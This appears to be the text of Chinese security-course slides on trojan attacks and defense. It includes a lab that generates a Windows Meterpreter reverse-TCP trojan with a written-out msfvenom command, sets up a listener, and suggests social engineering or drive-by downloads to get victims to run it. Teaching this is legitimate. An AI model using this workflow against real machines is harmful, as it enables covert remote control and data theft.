1、1 项目五 木马攻击与防范项目五 木马攻击与防范2 项目五 木马攻击与防范【项目概述】l木马是计算机病毒的一种,已经成为数量增长最快的计算机病毒。黑客通过灰鸽子、上线远控、Ghost木马等各种“肉鸡”控制工具,疯狂侵蚀着Internet安全。为了加强对木马的防范,网络安全公司决定根据木马的特征和主要攻击方式,对整个网络进行木马扫描,加强木马防范措施。3 项目五 木马攻击与防范【项目分析】l木马也称特洛伊木马,名称来源于希腊神话木马屠城记。古希腊派大军围攻特洛伊城,久久无法攻下。于是有人献计制造一只高二丈的大木马,假装为作战马神,让精兵藏匿于巨大的木马中,大部队假装撤退而将木马摒弃于特洛伊城下。
2、城中士兵得知解围的消息后,遂将“木马”作为奇异的战利品拖入城内,全称饮酒狂欢。到午夜时分,全城军民尽入梦乡,藏于木马中的将士打开城门,四处放火,城外埋伏的士兵涌入,部队里应外合,攻下了特洛伊城。l网络攻防中的木马指的是攻击者编写的一段恶意代码,它可以潜伏在被攻击者的计算机中。攻击者通过这个代码可以远程控制被攻击者的计算机,以窃取计算机上的信息或者操作计算机。从本质上讲,木马也是病毒的一种,因此很多用户也把木马称为病毒。4 项目五 木马攻击与防范l在本项目中,将介绍木马工作的原理、典型的木马使用过程、木马的生成方法、木马免杀技术、木马防范技术,提高计算机用户对木马的认识,加强在网络使用中对木马的
3、防范意识和措施,避免在网络使用中遭受木马攻击,造成损失。l本项目主要内容如下:l1.木马的使用。l2.木马的生成。l3.木马免杀。l4.木马的防范。5 项目五 木马攻击与防范项目主要内容:任务一 木马的使用任务二 木马的生成任务三 木马免杀任务四 木马的防范6 项目五 木马攻击与防范任务二 木马的生成7 项目五 木马攻击与防范l任务描述lMetasploit软件不仅可以进行渗透攻击,而且可以生成木马。在网络攻防中,需要生成木马,然后测试木马的危害。请使用Metasploit中的载荷(msfvenom)生成一个自己的木马。l任务分析lMetasploit中的载荷是在目标计算机上执行的一段代码,m
4、sf攻击载荷生成器允许用户把载荷进行封装,生成可执行的Shellcode。l在Kali2020系统中自带有Metasploit软件,利用项目一任务二搭建的攻防平台,可以启动Metasploit,然后利用msf攻击载荷生成器生成木马。8 项目五 木马攻击与防范l任务实施l本次任务实施拓扑示意图如图5-28所示。图5-28 木马的生成任务拓扑示意图9 项目五 木马攻击与防范l1.生成木马。l步骤1 在Kali2020系统中使用msfconsole命令启动Metasploit软件,如图5-29所示。图5-29 启动Metasploit软件10 项目五 木马攻击与防范l步骤2 在Metasploit平
5、台中输入msfvenom h,查看msfvenom命令的使用方法,如图5-30所示。图5-30 查看msfvenom命令的使用方法11 项目五 木马攻击与防范l步骤3 在Metasploit平台中输入命令,生成攻击木马,如图5-31所示。图5-31 生成攻击木马12 项目五 木马攻击与防范l在图5-31中,执行命令msfvenom-p windows/meterpreter/reverse_tcp LHOST=192.168.137.102 LPORT=4444-f exe /root/test.exe将生成一个反弹木马,反弹连接的地址为192.168.137.102(即Kali2020的地址
6、),指定平台为windows/meterpreter/reverse_tcp,指定监听端口为默认端口4444,-f用来指定木马程序的输出格式,/root/test.exe是指将木马程序保存在root目录下,程序名称为test.exe。13 项目五 木马攻击与防范l步骤4 在Kali2020的/root目录下,可查看到木马程序test.exe,如图5-32所示。图5-32 查看到木马程序test.exe14 项目五 木马攻击与防范l3.进行监听设置。l步骤1 在Metasploit平台中对被攻击者进行监听前的设置,装入模块以及设置payload,如图5-33所示。图5-33 装入模块以及设置pa
7、yload15 项目五 木马攻击与防范l步骤2 查看payload选项,如图5-34所示。图5-34 查看payload选项16 项目五 木马攻击与防范l步骤3 设置payload选项,并启用攻击模块,启动反弹连接控制端,如图5-35所示。图5-35 启动反弹连接控制端该步骤实施完之后,控制端已经设置完毕,等待服务端的反弹连接。17 项目五 木马攻击与防范l4.测试木马。l将test.exe拷贝到被攻击者计算机192.168.137.131上,可以采用社会工程学、挂马等手段,诱使被攻击者运行test.exe。被攻击者运行程序后,会在攻击端发起反弹连接,如图5-36所示。图5-36 被攻击者成功发起反弹连接18 项目五 木马攻击与防范THANKS